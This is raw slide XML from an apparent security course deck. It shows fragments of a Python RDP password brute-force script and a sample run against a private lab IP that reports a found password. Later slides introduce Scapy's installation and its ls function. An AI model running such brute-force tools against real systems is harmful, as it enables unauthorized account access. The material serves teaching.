                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>break</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logging.info(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> forcing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> finished"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"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CF6E22F-9115-44F6-80BD-E18BFEBAD9B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="4744271"/>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dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92FB1C9-1DB5-432F-B65A-8923EE4943DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608973" y="5256074"/>
            <a:ext cx="9372047" cy="646331"/>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200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python rdp_brute.py -u joe -P passwords.txt -t 192.168.10.192</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[31/12/2021 15:35:51] INFO: Found password: passw0rd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[31/12/2021 15:35:51] INFO: Brute forcing 192.168.10.192 finished</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F18A22F-E2FD-4BD2-9275-A5164A4F1073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="6091175"/>
            <a:ext cx="9247322" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full script can be found in the course repository at the time of this slide being presented.</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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39272002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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A45D39-AEE3-4FC1-A10B-483F39832A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686752" y="2285343"/>
            <a:ext cx="10370118" cy="224676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a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> “is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“These capabilities allow construction of tools that can probe, scan or attack networks”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Scapy is also a package in Python that we can integrate our Python scripts with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Scapy can be installed with pip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30EB413F-79AC-45F8-B049-8B1042E19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4474" y="170717"/>
            <a:ext cx="1379825" cy="137982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4490916"/>
            <a:ext cx="9372047" cy="1815882"/>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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Collecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</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Downloading scapy-2.4.5.tar.gz (1.1 MB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     |████████████████████████████████| 1.1 MB 376 kB/s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Using legacy 'setup.py install' for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, since package 'wheel' is not installed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Installing collected packages: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>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    Running setup.py install for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ... done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Successfully installed scapy-2.4.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30536516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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function</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98</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246221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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>help(ls)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Help on function ls in module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scapy.packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls(obj=None, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>case_sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=False, verbose=False)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    List  available layers, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on a given layer class or name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    :param obj: Packet / packet name to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    :param </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>case_sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: if obj is a string, is it case sensitive?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    :param verbose:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7634909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0A5366-2CC0-417F-8E38-F5B3BF6C5FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742529" y="214299"/>
            <a:ext cx="3480429" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Network (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B8EB2B-0B2F-4819-BC0E-5646F348B5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574609" y="1218543"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Scapy: Basics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A45D39-AEE3-4FC1-A10B-483F39832A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706403" y="1767985"/>
            <a:ext cx="10370118"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t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6638C663-C51C-4CB0-BE2D-CB63472F1543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B768E264-2E61-49E0-9A9C-0F6C4A807162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704474" y="2321221"/>
            <a:ext cx="9372047" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="1002">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls(IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>version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(4 bits)                  = ('4')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ihl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(4 bits)                  = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tos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XByteField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</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('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
